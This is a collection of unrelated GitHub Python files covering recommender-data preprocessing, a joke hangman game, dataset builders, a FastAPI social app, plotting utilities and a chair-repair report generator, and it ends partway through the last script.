{"seq_id":"14482322781","text":"import pickle\nfrom tqdm import tqdm\nimport numpy as np\n\n'''\n# 1.Label Encoding for sparse features,and process sequence features\n    for feat in feature_names['sparse']:\n        lbe = LabelEncoder()\n        full_data[feat] = lbe.fit_transform(full_data[feat])\n        hist_feat = 'hist_' + feat\n        if hist_feat in feature_names['vallen']:\n            for i, hist_list in enumerate(tqdm(full_data[hist_feat],\n                                               total=len(full_data[hist_feat]),\n                                               desc='labeling '+hist_feat)):\n                try:\n                    zero_index = hist_list.index(0)\n                except ValueError:\n                    zero_index = len(hist_list)\n                true_hist_list = lbe.transform(hist_list[:zero_index])\n                full_data[hist_feat][i] = list(true_hist_list) + hist_list[zero_index:]\n'''\n\ndef process_amazon(max_his_length=20, sub_name='Beauty'):\n    DIR = 'Amazon/' + sub_name + '/'\n    try:\n        data = pickle.load(open('processed_Amazon' + sub_name + '.pkl', 'rb'))\n    except:\n        uid_voc = pickle.load(open(DIR + 'uid_voc.pkl', 'rb'))\n        mid_voc = pickle.load(open(DIR + 'mid_voc.pkl', 'rb'))\n        cat_voc = pickle.load(open(DIR + 'cat_voc.pkl', 'rb'))\n        source_dicts = []\n        for source_dict in [uid_voc, mid_voc, cat_voc]:\n            source_dicts.append(source_dict)\n\n        feature_names = ['uid', 'mid', 'cat', 'hist_mid', 'hist_cat', 'seq_length']\n        # feature_names += ['item_bhvs_uid_feats', 'item_bhvs_id_feats', 'item_bhvs_cat_feats']\n\n        data = {}\n        total_num = sum([1 for _ in open(DIR + 'local_all_sample_sorted_by_time', 'r')])\n        with open(DIR + 'local_all_sample_sorted_by_time', 'r') as f_samp:\n            for line in tqdm(f_samp, total=total_num, desc='reading local_all_sample_sorted_by_time'):\n                ss = line.strip('\\n').split('\\t')\n                uid = source_dicts[0][ss[1]] if ss[1] in source_dicts[0] else 0\n                mid = source_dicts[1][ss[2]] if ss[2] in source_dicts[1] else 0\n                cat = source_dicts[2][ss[3]] if ss[3] in source_dicts[2] else 0\n\n                tmp = []\n                for fea in ss[4].split(\"|\"):\n                    m = source_dicts[1][fea] if fea in source_dicts[1] else 0\n                    tmp.append(m)\n                seq_length = len(tmp)\n                tmp += [0 for _ in range(max_his_length - len(tmp))]\n                hist_mid = tmp\n\n                tmp1 = []\n                for fea in ss[5].split(\"|\"):\n                    c = source_dicts[2][fea] if fea in source_dicts[2] else 0\n                    tmp1.append(c)\n                tmp1 += [0 for _ in range(max_his_length - len(tmp1))]\n                hist_cat = tmp1\n\n                for feature in feature_names:\n                    if feature in data.keys():\n                        
data[feature].append(eval(feature))\n else:\n data[feature] = [eval(feature)]\n\n if 'target' in data.keys():\n data['target'].append(float(ss[0]))\n else:\n data['target'] = [float(ss[0])]\n\n sample_num = len(data['uid'])\n for feat in feature_names + ['target']:\n data[feat] = np.array(data[feat]).reshape(sample_num, -1)\n\n pickle.dump(data, open('processed_Amazon' + sub_name + '.pkl', 'wb'))\n\ndef process_movielens(max_his_length=20):\n DIR = 'MovieLens/'\n try:\n data = pickle.load(open('processed_MovieLens.pkl', 'rb'))\n except:\n # load genre ids\n genre_dict = {}\n with open(DIR + 'u.genre', 'r') as f:\n for line in f:\n name, id = line.strip().split('|')\n genre_dict[name] = id\n gender_map = {\n 'M': 1,\n 'F': 2,\n }\n zip_voc = pickle.load(open(DIR + 'zipcode_voc.pkl', 'rb'))\n\n feature_names = ['uid', 'mid', 'cat',\n 'hist_mid', 'hist_cat', 'seq_length',\n 'gender', 'age', 'occup', 'u_zip']\n data = {}\n total_num = sum([1 for line in open(DIR + 'all_sample_with_histinfo', 'r')])\n with open(DIR + 'all_sample_with_histinfo', 'r') as f_samp:\n for line in tqdm(f_samp, total=total_num, desc='reading all_sample_with_histinfo'):\n ss = line.strip('\\n').split('\\t')\n\n uid, mid = [int(i) for i in ss[1:3]]\n genre_name = ss[3].split('|')[0]\n cat = int(genre_dict[genre_name])\n gender = gender_map[ss[6]]\n age, occup = [int(i) for i in ss[7:-2]]\n zipcode = ss[-2]\n u_zip = zip_voc[zipcode] if zipcode in zip_voc.keys() else 0\n\n tmp_m = [int(i) for i in ss[4].split(';')]\n tmp_m += [0 for _ in range(max_his_length - len(tmp_m))]\n seq_length = len(tmp_m)\n hist_mid = tmp_m\n\n tmp_g = []\n for fea in ss[5].split(';'):\n str_list = fea.split('|')\n id_list = [genre_dict[i] for i in str_list]\n tmp_g.append(int(id_list[0]))\n tmp_g += [0 for _ in range(max_his_length - len(tmp_g))]\n hist_cat = tmp_g\n\n for feature in feature_names:\n if feature in data.keys():\n data[feature].append(eval(feature))\n else:\n data[feature] = [eval(feature)]\n\n if 'target' in data.keys():\n data['target'].append(float(ss[0]))\n else:\n data['target'] = [float(ss[0])]\n\n sample_num = len(data['uid'])\n for feat in feature_names + ['target']:\n data[feat] = np.array(data[feat]).reshape(sample_num, -1)\n\n pickle.dump(data, open('processed_MovieLens.pkl', \"wb\"))\n\nif __name__ == \"__main__\":\n #process_amazon(sub_name='Clothing_Shoes_and_Jewelry')\n process_movielens()","repo_name":"ChenXiang1998/AutoCTR","sub_path":"CTRAPI/data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":6144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37037335423","text":"import os\nimport re\nimport sys\nimport requests\n\n\n# game settings\nbody_dict = {}\nbody_dict[6] = (f'--|')\nbody_dict[5] = (f'{body_dict[6]}\\n O')\nbody_dict[4] = (f'{body_dict[5]}\\n /')\nbody_dict[3] = (f'{body_dict[4]}|')\nbody_dict[2] = (f'{body_dict[3]}\\\\')\nbody_dict[1] = (f'{body_dict[2]}\\n /')\nbody_dict[0] = (f'{body_dict[1]} \\\\')\nguessed_letters = []\nwrong_letters = []\njoke_requests_remaining = 3\n# joke = 'What does an angry pepper do?'\n# punchline = 'It gets jalopeno face.'\n\n\ndef get_joke():\n headers = {'accept': 'application/json'}\n for _ in range(joke_requests_remaining):\n response = requests.get('https://icanhazdadjoke.com/', headers=headers)\n data = response.json()\n text = data['joke']\n # restrict joke format from API response to two part joke\n joke_match = re.search(r'(.+[.?!])(.+[.?!])', text)\n if joke_match:\n 
joke = joke_match.group(1).strip()\n punchline = joke_match.group(2).strip()\n return joke, punchline\n # discard joke if there is no distinct punchline\n print(\n f'Did not get a good joke. {joke_requests_remaining} tries left.')\n sys.exit(1)\n\n\ndef update_blanks(punchline):\n display = []\n for char in punchline.lower():\n if not char.isalpha() or char in guessed_letters:\n display.append(char)\n else:\n display.append('_')\n display[0] = display[0].upper()\n return ' '.join(display)\n\n\ndef main():\n num_of_chances_remaining = 6\n joke = get_joke()\n text, punchline = joke\n\n while True:\n os.system('cls' if os.name == 'nt' else 'clear')\n print(f'\\n{text}\\n')\n gameboard = update_blanks(punchline)\n if '_' not in gameboard:\n print(punchline)\n print(f'\\nNice Job! Laugh Away!!\\n')\n break\n print(gameboard)\n print(f'\\nNumber of guesses remaining...{num_of_chances_remaining}\\n')\n print(body_dict[num_of_chances_remaining])\n print(f\"\\nIncorrect guesses: {' '.join(wrong_letters)}\")\n guess = input(\"Guess a letter: \").lower()\n if guess not in punchline.lower():\n wrong_letters.append(guess)\n if guess not in guessed_letters:\n num_of_chances_remaining -= 1\n if guess not in guessed_letters:\n guessed_letters.append(guess)\n if not num_of_chances_remaining:\n os.system('cls' if os.name == 'nt' else 'clear')\n print(body_dict[num_of_chances_remaining])\n print(f'\\nClose but no cigar\\n')\n break\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hmcollard/hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9445063751","text":"import math\nfrom collections import defaultdict\n\nimport json\nimport numpy as np\nimport random\nfrom gensim.models.deprecated.fasttext_wrapper import FastText\nfrom tqdm import tqdm\nfrom nltk import sent_tokenize\nfrom cat_config import get_cats\nfrom max_sim import calc_similarity\nimport os\nimport pandas as pd\n\nLAPTOPS_DOMAIN_NAME = 'laptops'\nREST_DOMAIN_NAME = 'rest'\nHOTEL_DOMAIN_NAME = 'hotel'\nDEVICES_DOMAIN_NAME = 'devices'\nBOOKS_DOMAIN_NAME = 'books'\ndomains = [LAPTOPS_DOMAIN_NAME, REST_DOMAIN_NAME]\ncats = {d: get_cats(d) for d in domains}\n\n\ndef get_max_cat_similarity(token_text, domain_categories, model):\n max_similarity = -1\n max_cat = None\n for domain_cat in domain_categories:\n similarity = calc_similarity(token_text, domain_cat, model)\n if similarity is not None and similarity[0][0] > max_similarity:\n max_similarity = similarity[0][0].item()\n max_cat = domain_cat\n return max_similarity, max_cat\n\n\ndef create_dataset(reviews_path, domain, dataset_output_path, embedding_model_path='embeddings/cc.en.300', config={}):\n print(f'Creating the dataset cache for the CPP task for {domain}')\n if os.path.exists(dataset_output_path):\n return json.load(open(dataset_output_path, 'r+'))\n print(dataset_output_path)\n embedding_model = FastText.load_fasttext_format(embedding_model_path)\n with open(reviews_path, 'r') as reviews_fp:\n reviews = reviews_fp.readlines()\n reviews_res = []\n sampled_reviews = [y for x in random.sample(reviews, min(10000, len(reviews))) for y in sent_tokenize(x)]\n saved_res = defaultdict(dict)\n for review in tqdm(sampled_reviews):\n review_res = {}\n for cat in cats[domain]:\n review_res[cat] = {}\n for token in review.split():\n if saved_res.get(cat,{}).get(token, None) is None:\n similarity = calc_similarity(token, cat, 
embedding_model)\n else:\n similarity = saved_res.get(cat).get(token, None)\n\n review_res[cat][token] = str(similarity[0][0]) if similarity is not None else str(-1)\n saved_res[cat][token] = review_res[cat][token]\n reviews_res.append((review_res, review))\n json.dump(reviews_res, open(dataset_output_path, 'w+'))\n return reviews_res\n\n\ndef create_classification_dataset_for_threshold(reviews_to_similarities, domains, thresholds,\n num_of_samples, seed=1):\n output_filename = f'{\"_\".join(domains)}_{\"_\".join([str(t) for t in thresholds])}_num_of_samples_{num_of_samples}.csv'\n if os.path.exists(output_filename):\n return output_filename\n res_dic = defaultdict(list)\n random.seed(seed)\n for domain, threshold in zip(domains, thresholds):\n for similarities, review in random.sample(reviews_to_similarities[domain], num_of_samples):\n res_dic['text'].append(review)\n for cat in cats[domain]:\n res_dic[f'{domain}_{cat}'].append(any(float(x) > threshold for x in similarities[cat].values()))\n for other_domain in [d for d in domains if d != domain]:\n for cat in cats[other_domain]:\n res_dic[f'{other_domain}_{cat}'].append(False)\n df = pd.DataFrame(data=res_dic)\n df.to_csv(output_filename)\n return output_filename\n\n\ndef create_classification_dataset_dynamic(reviews_to_similarities, domain1, domain2, percent_of_categories,\n num_of_samples):\n output_filename = f'classification_datasets/cats%_{percent_of_categories}_num_of_samples_{num_of_samples}_{domain1}_{domain2}.csv'\n if os.path.exists(output_filename):\n return\n res_dic = defaultdict(list)\n random.seed(1)\n for similarities, review in random.sample(reviews_to_similarities[domain1], num_of_samples):\n res_dic['text'].append(review)\n cat_for_review = {}\n for cat in cats[domain1]:\n cat_for_review[cat] = max([float(x) for x in similarities[cat].values()])\n percentile = np.percentile(list(cat_for_review.values()), 100 - (percent_of_categories * 100))\n for cat in cats[domain1]:\n res_dic[f'{domain1}_{cat}'].append(any(float(x) > percentile for x in similarities[cat].values()))\n for cat in cats[domain2]:\n res_dic[f'{domain2}_{cat}'].append(False)\n random.seed(1)\n for similarities, review in random.sample(reviews_to_similarities[domain2], num_of_samples):\n res_dic['text'].append(review)\n cat_for_review = {}\n for cat in cats[domain2]:\n cat_for_review[cat] = max([float(x) for x in similarities[cat].values()])\n percentile = np.percentile(list(cat_for_review.values()), 100 - (percent_of_categories * 100))\n for cat in cats[domain2]:\n res_dic[f'{domain2}_{cat}'].append(any(float(x) > percentile for x in similarities[cat].values()))\n for cat in cats[domain1]:\n res_dic[f'{domain1}_{cat}'].append(False)\n df = pd.DataFrame(data=res_dic)\n df.to_csv(output_filename)\n\n\ndef create_classification_sum_tokens(reviews_to_similarities, domains, alphas,\n num_of_samples, seed):\n output_filename = f'classification_datasets/numeric_{seed}_{\"_\".join(domains)}_{\"_\".join([str(t) for t in alphas])}_samples_{num_of_samples}.csv'\n if os.path.exists(output_filename):\n return output_filename\n res_df = create_domain_df(domains, alphas, num_of_samples, reviews_to_similarities, seed)\n res_df = res_df[['text'] + sorted([c for c in res_df.columns if c != 'text'])]\n\n res_df.to_csv(output_filename)\n return output_filename\n\n\ndef create_domain_df(domains, alphas, num_of_samples, reviews_to_similarities, seed):\n res_dic = defaultdict(list)\n random.seed(seed)\n for domain, alpha in zip(domains, alphas):\n for similarities, review in 
random.sample(reviews_to_similarities[domain], num_of_samples):\n res_dic['text'].append(review)\n cat_for_review = {}\n for cat in cats[domain]:\n cat_for_review[cat] = sum([float(x) for x in similarities[cat].values()])\n num_of_categories_1 = round(alpha * len(review.split()))\n max_cats = [x[0] for x in\n sorted(cat_for_review.items(), key=lambda x: x[1], reverse=True)[:num_of_categories_1]]\n for cat in cats[domain]:\n if cat in max_cats:\n res_dic[f'{domain}_{cat}'].append(True)\n else:\n res_dic[f'{domain}_{cat}'].append(False)\n for other_domain in [d for d in domains if d != domain]:\n for cat in cats[other_domain]:\n res_dic[f'{other_domain}_{cat}'].append(False)\n df = pd.DataFrame(data=res_dic)\n return df\n\n\ndef create_classification_num_of_top_categories(reviews_to_similarities, domains, num_top_categories,\n num_of_samples, seed):\n output_filename = f'classification_datasets/num_cat_{seed}_{\"_\".join(domains)}_{\"_\".join([str(t) for t in num_top_categories])}_samples_{num_of_samples}.csv'\n if os.path.exists(output_filename):\n return output_filename\n res_dic = defaultdict(list)\n random.seed(seed)\n for domain, num_cat in zip(domains, num_top_categories):\n for similarities, review in random.sample(reviews_to_similarities[domain], num_of_samples):\n res_dic['text'].append(review)\n cat_for_review = {}\n for cat in cats[domain]:\n cat_for_review[cat] = sum([float(x) for x in similarities[cat].values()])\n max_cats = [x[0] for x in\n sorted(cat_for_review.items(), key=lambda x: x[1], reverse=True)[:num_cat]]\n for cat in cats[domain]:\n if cat in max_cats:\n res_dic[f'{domain}_{cat}'].append(True)\n else:\n res_dic[f'{domain}_{cat}'].append(False)\n for other_domain in [d for d in domains if d != domain]:\n for cat in cats[other_domain]:\n res_dic[f'{other_domain}_{cat}'].append(False)\n df = pd.DataFrame(data=res_dic)\n df = df[['text'] + sorted([c for c in df.columns if c != 'text'])]\n\n df.to_csv(output_filename)\n return output_filename\n\n\n# thresholds = np.arange(0.31, 0.41, 0.02)\nlist_of_num_of_samples = [1000]\n# thresholds1 = [0.32, 0.31, 0.32, 0.31, 0.315, 0.3, 0.315, 0.31]\n# thresholds2 = [0.32, 0.32, 0.31, 0.31, 0.315, 0.3, 0.31, 0.315]\n# for threshold1, threshold2 in tqdm(zip(thresholds1, thresholds2), desc='Thresholds'):\n# for num_of_samples in tqdm(list_of_num_of_samples, desc='Num of samples'):\n# create_classification_dataset_for_threshold(reviews_to_similarities,\n# REST_DOMAIN_NAME,\n# HOTEL_DOMAIN_NAME,\n# threshold1, threshold2,\n# num_of_samples)\n# list_of_percent_of_categories = [0.1] # [0.05, 0.1, 0.15, 0.2]\n# for percent_of_categories in tqdm(list_of_percent_of_categories, desc='Percent of cats'):\n# for num_of_samples in tqdm(list_of_num_of_samples, desc='Num of samples'):\n# create_classification_dataset_dynamic(reviews_to_similarities, REST_DOMAIN_NAME, HOTEL_DOMAIN_NAME,\n# percent_of_categories,\n# num_of_samples)\nif __name__ == '__main__':\n num_of_categories = [(1, 1), (2, 1), (2, 2)] # [0.05, 0.1, 0.15, 0.2]\n alphas = [\n (0.03, 0.03),\n (0.04, 0.04),\n (0.05, 0.05)\n # (0.04, 0.04),\n # (0.05, 0.05), (0.05, 0.06), (0.06, 0.05), (0.06, 0.06), (0.04, 0.04), (0.03, 0.04), (0.04, 0.03),\n # (0.05, 0.04),\n # (0.04, 0.05), (0.03, 0.03)\n ]\n\n dfs = []\n for alpha in tqdm(alphas, desc='Percent of cats'):\n for num_of_samples in tqdm(list_of_num_of_samples, desc='Num of samples'):\n res = create_classification_sum_tokens(reviews_to_similarities, LAPTOPS_DOMAIN_NAME,\n REST_DOMAIN_NAME,\n alpha[0], alpha[1],\n num_of_samples, 2)\n 
dfs.append(res)\n print(dfs)\n","repo_name":"tonylekhtman/DILBERT","sub_path":"classification_data_creation.py","file_name":"classification_data_creation.py","file_ext":"py","file_size_in_byte":10502,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"71702681654","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\nimport json\nimport logging\nimport os\nfrom contextlib import contextmanager\nfrom pathlib import Path\nfrom typing import (\n Any,\n Callable,\n Dict,\n Iterable,\n Iterator,\n List,\n MutableMapping,\n NamedTuple,\n Tuple,\n TypeVar,\n cast,\n)\n\nimport toml\n\nfrom .plugins import Cache, FileManager, Parallel, TmpdirManager\nfrom .remotes import Remote\nfrom .rules import Rule\nfrom .sessions import Session\nfrom .tasks import Task\nfrom .utils import Pathable, get_timestamp\n\n__all__ = ()\n\nlog = logging.getLogger(__name__)\n\n_R = TypeVar('_R', bound=Rule[object])\nArgFactory = Callable[[str], object]\n\n\nclass Entry(NamedTuple):\n rule: Rule[object]\n factories: Tuple[ArgFactory, ...]\n stdout: bool\n\n\nclass Mona:\n MONADIR = '.mona'\n TMPDIR = 'tmpdir'\n FILES = 'files'\n CACHE = 'cache.db'\n LAST_ENTRY = 'LAST_ENTRY'\n\n def __init__(self, monadir: Pathable = None) -> None:\n monadir = monadir or os.environ.get('MONA_DIR') or Mona.MONADIR\n self._monadir = Path(monadir).resolve()\n self._configfile = self._monadir / 'config.toml'\n self._config: Dict[str, Any] = {}\n self._entries: Dict[str, Entry] = {}\n for path in [\n Path('~/.config/mona/config.toml').expanduser(),\n Path('mona.toml'),\n self._configfile,\n ]:\n if path.exists():\n with path.open() as f:\n self._config.update(toml.load(f))\n\n def entry(\n self, name: str, *factories: ArgFactory, stdout: bool = False\n ) -> Callable[[_R], _R]:\n def decorator(rule: _R) -> _R:\n self._entries[name] = Entry(rule, factories, stdout)\n return rule\n\n return decorator\n\n def get_entry(self, name: str) -> Entry:\n return self._entries[name]\n\n def call_entry(self, name: str, *arg_strings: str) -> Task[object]:\n rule, factories, _ = self._entries[name]\n args = [factory(arg_str) for factory, arg_str in zip(factories, arg_strings)]\n return rule(*args)\n\n def create_session(self, warn: bool = False, **kwargs: Any) -> Session:\n sess = Session(warn=warn)\n self(sess, **kwargs)\n return sess\n\n @property\n def last_entry(self) -> List[str]:\n return cast(\n List[str], json.loads((self._monadir / Mona.LAST_ENTRY).read_text())\n )\n\n @last_entry.setter\n def last_entry(self, entry: List[str]) -> None:\n (self._monadir / Mona.LAST_ENTRY).write_text(json.dumps(entry))\n\n def call_last_entry(self) -> Task[object]:\n return self.call_entry(*self.last_entry)\n\n def __call__(\n self,\n sess: Session,\n ncores: int = None,\n write: str = 'eager',\n full_restore: bool = False,\n ) -> None:\n self._plugins = {\n 'parallel': Parallel(ncores),\n 'tmpdir': TmpdirManager(self._monadir / Mona.TMPDIR),\n 'files': FileManager(self._monadir / Mona.FILES),\n 'cache': Cache.from_path(\n self._monadir / Mona.CACHE, write=write, full_restore=full_restore\n ),\n }\n for plugin in self._plugins.values():\n plugin(sess)\n\n def ensure_initialized(self) -> None:\n if self._monadir.is_dir():\n log.info(f'Already initialized in {self._monadir}.')\n return\n log.info(f'Initializing an empty repository in {self._monadir}.')\n 
self._monadir.mkdir()\n try:\n cache_home = Path(self._config['cache'])\n except KeyError:\n for dirname in [Mona.TMPDIR, Mona.FILES]:\n (self._monadir / dirname).mkdir()\n else:\n ts = get_timestamp()\n cachedir = cache_home / f'{Path.cwd().name}_{ts}'\n cachedir.mkdir()\n for dirname in [Mona.TMPDIR, Mona.FILES]:\n (cachedir / dirname).mkdir()\n (self._monadir / dirname).symlink_to(cachedir / dirname)\n\n @contextmanager\n def update_config(self) -> Iterator[MutableMapping[str, Any]]:\n if self._configfile.exists():\n with self._configfile.open() as f:\n config = toml.load(f)\n else:\n config = {}\n yield config\n self._config.update(config)\n if config:\n with self._configfile.open('w') as f:\n toml.dump(config, f)\n\n def parse_remotes(self, remote_str: str) -> Iterable[Remote]:\n if remote_str == 'all':\n remotes = list(self._config['remotes'].values())\n else:\n remotes = [self._config['remotes'][name] for name in remote_str.split(',')]\n for remote in remotes:\n yield Remote(remote['host'], remote['path'])\n","repo_name":"jhrmnn/mona","sub_path":"src/mona/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"41215214776","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nplt.rcParams['axes.linewidth'] = 2\nplt.rcParams['xtick.major.size']=8\nplt.rcParams['ytick.major.size']=8\nplt.rcParams['xtick.major.width']=2\nplt.rcParams['ytick.major.width']=2\nplt.rcParams['xtick.direction']='in'\nplt.rcParams['ytick.direction']='in'\n\nData = np.loadtxt('LocalDensityMatrix.dat')\nvmax=Data.max()\nfig = plt.figure()\nax = fig.add_subplot(111)\ncaxes=ax.matshow(Data,cmap=plt.cm.bwr,vmin=-vmax,vmax=vmax)\nax.set_xlabel('Site',fontsize=16)\nax.set_ylabel('Site',fontsize=16)\nax.xaxis.set_ticks_position('bottom')\nfig.colorbar(caxes)\nplt.savefig('LocalDensityMatrix.png',dpi=400)\nplt.show()\n\nData = np.loadtxt('SpectralDensityMatrix.dat')\nvmax=Data.max()\nfig = plt.figure()\nax = fig.add_subplot(111)\ncaxes=ax.matshow(Data,cmap=plt.cm.bwr,vmin=-vmax,vmax=vmax)\nax.set_xlabel('Site',fontsize=16)\nax.set_ylabel('Site',fontsize=16)\nax.xaxis.set_ticks_position('bottom')\nfig.colorbar(caxes)\nplt.savefig('SpectralDensityMatrix.png',dpi=400)\nplt.show()\n\n","repo_name":"GHlacour/NISE_Tutorials","sub_path":"LH2/densityPlot.py","file_name":"densityPlot.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"69902270134","text":"import cv2\r\n\r\n\r\ndef find_start_end_nodes(img_path):\r\n image = cv2.imread(img_path)\r\n dims = image.shape\r\n\r\n width = dims[1]\r\n height = dims[0]\r\n pxlz = []\r\n\r\n for x in range(width):\r\n for y in range(height):\r\n px_val = image[y, x]\r\n pxlz.append(tuple(px_val))\r\n\r\n pixel_set = set(pxlz)\r\n non_bw_rgb = None\r\n for rgb in pixel_set:\r\n if rgb != (0, 0, 0) and rgb != (255, 255, 255):\r\n non_bw_rgb = rgb\r\n\r\n nodes = []\r\n for x in range(width):\r\n for y in range(height):\r\n px_val = image[y, x]\r\n if tuple(px_val) == non_bw_rgb:\r\n nodes.append((x, y))\r\n\r\n return nodes\r\n\r\n\r\n","repo_name":"joeholden/Breadth-First-Search_Image-Connectivity","sub_path":"find_start_end_targets.py","file_name":"find_start_end_targets.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38741662844","text":"import 
random\nimport torch\nimport pandas as pd\nfrom pathlib import Path\nimport torch.utils.data as data\nimport numpy as np\n\nclass WsiFeatDataset(data.Dataset):\n '''WsiFeatDataset\n Args:\n state (str): train or test stage\n data_dir (str): path to wsi feature data\n label_dir (str): path to label data\n nfolds (int): n-fold cross validation strategy. Default: 4\n fold (int): currently processing i-th fold. Value range: [0,n-1]\n data_shuffle (bool): shuffle strategy. Default: False\n '''\n def __init__(self, state=None, data_dir=None, label_dir=None, nfold=4, fold=0, data_shuffle=False, **kwargs):\n super(WsiFeatDataset, self).__init__()\n\n self.state = state\n self.nfolds = nfold\n self.fold = fold\n self.feature_dir = data_dir\n self.csv_dir = label_dir + f'fold{self.fold}.csv'\n self.slide_data = pd.read_csv(self.csv_dir, index_col=0)\n self.data_shuffle = data_shuffle\n\n # split dataset\n if state == 'train':\n self.data = self.slide_data.loc[:, 'train'].dropna()\n self.label = self.slide_data.loc[:, 'train_label'].dropna()\n if state == 'val':\n self.data = self.slide_data.loc[:, 'val'].dropna()\n self.label = self.slide_data.loc[:, 'val_label'].dropna()\n if state == 'test':\n self.data = self.slide_data.loc[:, 'test'].dropna()\n self.label = self.slide_data.loc[:, 'test_label'].dropna()\n \n def __len__(self):\n return len(self.data)\n\n # dataloader automatically call __getitem__()\n def __getitem__(self, idx):\n slide_id = self.data[idx]\n label = int(self.label[idx])\n full_path = Path(self.feature_dir) / f'{slide_id}.pt'\n features = torch.load(full_path)\n\n # shuffle\n if self.data_shuffle == True:\n index = [x for x in range(features.shape[0])]\n random.shuffle(index)\n features = features[index]\n\n return slide_id, features, label","repo_name":"RuixiangZhao/WSI_classification_baseline","sub_path":"datasets/wsi_feat_dataset.py","file_name":"wsi_feat_dataset.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19719884671","text":"def email_slicer(emails: list) -> None:\n for email in emails:\n if '@' in email:\n usr, domain = email.split('@')\n extension = domain.split('.')[1]\n print(f'Username: {usr}')\n print(f'Domain: {domain}')\n print(f'Extension: {extension}')\n\nemail_slicer(['john.doe@yahoo.com', 'jane.doe@hotmail.com','john.doe@proton.me'])\n","repo_name":"Exclob/Python-Beginner-Projects","sub_path":"email_slicer.py","file_name":"email_slicer.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33809071801","text":"from fastapi import FastAPI\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom config import settings\nfrom routes.user import router as UserRouter\nfrom routes.post import router as PostRouter\nfrom routes.comment import router as CommentRouter\nfrom routes.relationship import router as RelationshipRouter\nfrom routes.chat import router as ChatRouter\nfrom routes.room import router as RoomRouter\nfrom db.redis import redis_cache\n\napp = FastAPI()\n\norigins = [\n \"http://localhost:3000\",\n]\n\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"]\n)\n\n@app.on_event(\"startup\")\nasync def 
startup_db_client():\n await redis_cache.init_cache()\n # value = await redis_cache.keys('*')\n # await redis_cache.set(\"boss\", \"trungtin\")\n # messages = await redis_cache.xread(['test'], timeout=60000)\n # print(messages)\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown_db_client():\n await redis_cache.close()\n\n\n@app.get(\"/\", tags=[\"Root\"], response_class=HTMLResponse)\nasync def read_root() -> dict:\n return \"\"\"\n \n \n TinySM | FastAPI\n \n \n

Gotcha! Browse to /docs for details!

\n \n \n \"\"\"\n\napp.include_router(UserRouter, tags=[\"User\"], prefix=\"/auth\")\napp.include_router(PostRouter, tags=[\"Post\"], prefix=\"/post\")\napp.include_router(CommentRouter, tags=[\"Comment\"], prefix=\"/comment\")\napp.include_router(RelationshipRouter, tags=[\"Relationship\"], prefix=\"/relationship\")\napp.include_router(ChatRouter, tags=[\"Chat\"], prefix=\"/chat\")\napp.include_router(RoomRouter, tags=[\"Room\"], prefix=\"/room\")\n\n\n","repo_name":"freddieentity/fastapi-tinysm-neo4j-redis","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5623499107","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\nfrom reportlab.pdfgen import canvas\n\n\nclass Silla:\n def __init__(self, nombre):\n self.nombre = nombre\n\n brazo = 0\n rueda = 0\n piston = 0\n basculante = 0\n estrella = 0\n\n\n# Abre el excel de la ruta indicada y toma los datos de la columna\ndef obtenerdatoscolumna(ruta: str, columna: str):\n xls = pd.read_excel(ruta)\n info = xls[columna].values\n return info\n\n\n# Con los nombres indicados crea objetos\ndef crearobjetos(arrayNombres: list):\n newObjts = []\n for i in arrayNombres:\n silla = Silla(i.lower())\n newObjts.append(silla)\n return newObjts\n\n\n# Comprueba si la avería coincide con alguna pieza reparable y devuelve la palabra localizada\ndef esReparable(averia: str, palabrasClave: list):\n for palabra in palabrasClave:\n if palabra in averia:\n return palabra\n return None\n\n\n# Main\ndef encontrarMarca(marca: str, nombresComparar: list):\n for nombre in nombresComparar:\n if nombre.lower() in marca.lower():\n return nombre.lower()\n\n\ndef encontrarSilla(actualMarca: str, allSillas: list):\n for silla in allSillas:\n if actualMarca in silla.nombre:\n return silla\n\n\ndef crearPdf(allSillas: list, dataAverias: list, sillasSalvables: int):\n pdf = canvas.Canvas('Informe de Sillas.pdf')\n ejeX = 80\n ejeY = 750\n for final in allSillas:\n if not (final.piston == 0 and final.estrella == 0 and\n final.rueda == 0 and final.brazo == 0 and\n final.basculante == 0):\n if ejeY <= 75:\n ejeX = 100\n ejeY = 750\n pdf.showPage()\n pdf.drawString(ejeX, ejeY, 'Sobre la marca: ' + final.nombre.capitalize())\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY,\n 'Las siguientes piezas podrían haber sido sustituidas para evitar la llegada del artículo a')\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY, 'PcComponentes:')\n ejeY = ejeY - 25\n pdf.drawString(ejeX, ejeY, 'Estrellas: ' + 